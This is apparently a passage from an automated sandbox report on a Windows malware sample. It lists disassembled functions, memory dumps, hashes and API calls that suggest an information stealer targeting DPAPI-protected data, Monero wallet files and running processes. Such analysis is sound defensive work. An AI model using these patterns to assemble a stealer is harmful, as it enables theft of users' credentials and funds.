                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 99adabec429bea8a84424d37266fb85a94421799597e68ab5552c326bff31a21
                                • Instruction ID: ed81176a3b3ae6ac4ed9bea0557e2b677a7cee94f713a51143e7323ad8679dfa
                                • Opcode Fuzzy Hash: 99adabec429bea8a84424d37266fb85a94421799597e68ab5552c326bff31a21
                                • Instruction Fuzzy Hash: F6414A7194021CABDB24DB94DC99BEEBBB8FF58700F208599E409621D1DB742F85CFA1
                                Function 008B3C2D Relevance: 10.3, Strings: 7, Instructions: 1578COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *.}$0nJ!$P4\$|tK$3%e${c~$}
                                • API String ID: 0-3869705807
                                • Opcode ID: d73412e69f40caa4d10d66fc08eddc100e22e1f446c11edcb36d713a4ef415a4
                                • Instruction ID: bb636b21e270db9b770f38280e4f8f396c40b8ce1b600d4fb1cf1ff9f98449cb
                                • Opcode Fuzzy Hash: d73412e69f40caa4d10d66fc08eddc100e22e1f446c11edcb36d713a4ef415a4
                                • Instruction Fuzzy Hash: 29B205F3A0C6049FE3086E2DEC4567ABBE5EFD4720F16493DE6C5C3344EA3598058696
                                Function 004FE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00510D73), ref: 004FE4A2
                                • StrCmpCA.SHLWAPI(?,005114F8), ref: 004FE4F2
                                • StrCmpCA.SHLWAPI(?,005114FC), ref: 004FE508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FEBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: ee48d121a288d2bc4d432c4e15b04aab921c6ff2ff42d7c8682cbc480efd7fd0
                                • Instruction ID: 41584b4346aaa313e5584bdfdf10f56c408d91719a42f8755e7320c1651b627a
                                • Opcode Fuzzy Hash: ee48d121a288d2bc4d432c4e15b04aab921c6ff2ff42d7c8682cbc480efd7fd0
                                • Instruction Fuzzy Hash: D91230719102199ADB14FB60DD9AEEE7738BFD4300F4085A9B50A960D1EF346F49CF92
                                Function 004F9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,004F4EEE,00000000,?), ref: 004F9B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9B2A
                                • LocalFree.KERNEL32(?,?,?,?,004F4EEE,00000000,?), ref: 004F9B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: NO
                                • API String ID: 4291131564-1822992918
                                • Opcode ID: b25654791a96f8f7ba9418fc118759afcb0820e6369193ff9bf352246954754e
                                • Instruction ID: 78aa6a58be1c11716273f122eec6bed8841a3913449b127a39accbf5f8146974
                                • Opcode Fuzzy Hash: b25654791a96f8f7ba9418fc118759afcb0820e6369193ff9bf352246954754e
                                • Instruction Fuzzy Hash: 2511A2B4640208BFEB10CF64DC95FAA77B5FB89701F208059FA159B3D0C7B6A901CB94
                                Function 004FC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004FC871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004FC87C
                                • lstrcat.KERNEL32(?,00510B46), ref: 004FC943
                                • lstrcat.KERNEL32(?,00510B47), ref: 004FC957
                                • lstrcat.KERNEL32(?,00510B4E), ref: 004FC978
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: a62dabc368872fd426ce9d06c225504dcca28217392547d5ce0ca0830ee79ae6
                                • Instruction ID: 5bd7de3ffe24412aca5afb8f9ab6e889db1183b6e0a1874122792d8bc92c71fe
                                • Opcode Fuzzy Hash: a62dabc368872fd426ce9d06c225504dcca28217392547d5ce0ca0830ee79ae6
                                • Instruction Fuzzy Hash: A44174B590420DEBDB10CFA4CD8AFFEB7B8BB44305F1081A8E509A7280D7785A85CF95
                                Function 00506920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 0050696C
                                • sscanf.NTDLL ref: 00506999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005069B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005069C0
                                • ExitProcess.KERNEL32 ref: 005069DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: f0ab311cc5863e9de229e8e9855f73b536ca373216bce24caa4337b96f88688c
                                • Instruction ID: 48726d713f10e2ff15be96fd0b90e7499accbc5828d18a7c9d32c76cee837199
                                • Opcode Fuzzy Hash: f0ab311cc5863e9de229e8e9855f73b536ca373216bce24caa4337b96f88688c
                                • Instruction Fuzzy Hash: 3C21CB75D14209ABDF04EFE4D946AEEBBB5BF48301F04852AE406E3250EB349615CB69
                                Function 004F7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004F724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F7254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004F7281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004F72A4
                                • LocalFree.KERNEL32(?), ref: 004F72AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: fca1ff0af9f47283d56733f9fd033b2cf8b86ebd9f7c512644b95b4159394a31
                                • Instruction ID: 03dcf60bff0ae70dde8061d0ce8f31f0e46e538ec4541b61954b477323bf5e34
                                • Opcode Fuzzy Hash: fca1ff0af9f47283d56733f9fd033b2cf8b86ebd9f7c512644b95b4159394a31
                                • Instruction Fuzzy Hash: 4E011675A40208BBEB10DFD4DD46F9D7778FB44701F108555F745BB2C0D674AA018B69
                                Function 00509600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0050961E
                                • Process32First.KERNEL32(00510ACA,00000128), ref: 00509632
                                • Process32Next.KERNEL32(00510ACA,00000128), ref: 00509647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 0050965C
                                • CloseHandle.KERNEL32(00510ACA), ref: 0050967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: aaf3490c96ed2144070fe35ad768d813e3ad3c5711f59f2b92dda7ce074e2ac0
                                • Instruction ID: b77e9fee802eb73c8460e49ddc44294c313fb80e592526b250ef39bf7974e9ef
                                • Opcode Fuzzy Hash: aaf3490c96ed2144070fe35ad768d813e3ad3c5711f59f2b92dda7ce074e2ac0
                                • Instruction Fuzzy Hash: 65011E75A00208FBDB15DFA5CD89BEDBBF8FB48701F108598A945A7290DB359B40CF51
                                Function 008B8BD7 Relevance: 6.6, Strings: 4, Instructions: 1608COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: B?|$B/$B/$}
                                • API String ID: 0-2871083107
                                • Opcode ID: 371c34650fbed205c5dc2ef1708608bf1a92e1b339d28660d558b97c96a2acec
                                • Instruction ID: 4f5430a1a6aeb31fd21b6b42681946e06579073e5a41e711ef39c6a85a0f4bc1
                                • Opcode Fuzzy Hash: 371c34650fbed205c5dc2ef1708608bf1a92e1b339d28660d558b97c96a2acec
                                • Instruction Fuzzy Hash: BAB209F360C2109FE314AE29EC8577ABBE9EFD4320F16853DEAC487744EA3558058796
                                Function 00508EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,004F5184,40000001,00000000,00000000,?,004F5184), ref: 00508EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 3e0e41810828d1c01afd6e25d449560eb4165b5df8f811b62d4da51adf814a52
                                • Instruction ID: 89af44165c31045e741a34acf0fdff6df8d0501635eaed7dd039833ae19e5089
                                • Opcode Fuzzy Hash: 3e0e41810828d1c01afd6e25d449560eb4165b5df8f811b62d4da51adf814a52
                                • Instruction Fuzzy Hash: BF110670200209FFDB00CF64D889FBB3BA9BF89301F109848F9998B290DB35E841DB64
                                Function 00507A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,012DD9C8,00000000,?,00510E10,00000000,?,00000000,00000000), ref: 00507A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00507A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,012DD9C8,00000000,?,00510E10,00000000,?,00000000,00000000,?), ref: 00507A7D
                                • wsprintfA.USER32 ref: 00507AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: fd4302b99224692a6661e54e9f2f9e3ad823ad17041dc2206a4f5e6d2223a2f9
                                • Instruction ID: 9dd93fd42699c86b5f2540f620cb5c7ec33bb1259c0abbc531f1fcca1e47894a
                                • Opcode Fuzzy Hash: fd4302b99224692a6661e54e9f2f9e3ad823ad17041dc2206a4f5e6d2223a2f9
                                • Instruction Fuzzy Hash: 57118EB1E45218EBEB208F54DC4AFA9BB78FB04721F10479AE90A932C0C7781A44CF51
                                Function 008BFFAC Relevance: 6.0, Strings: 4, Instructions: 959COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
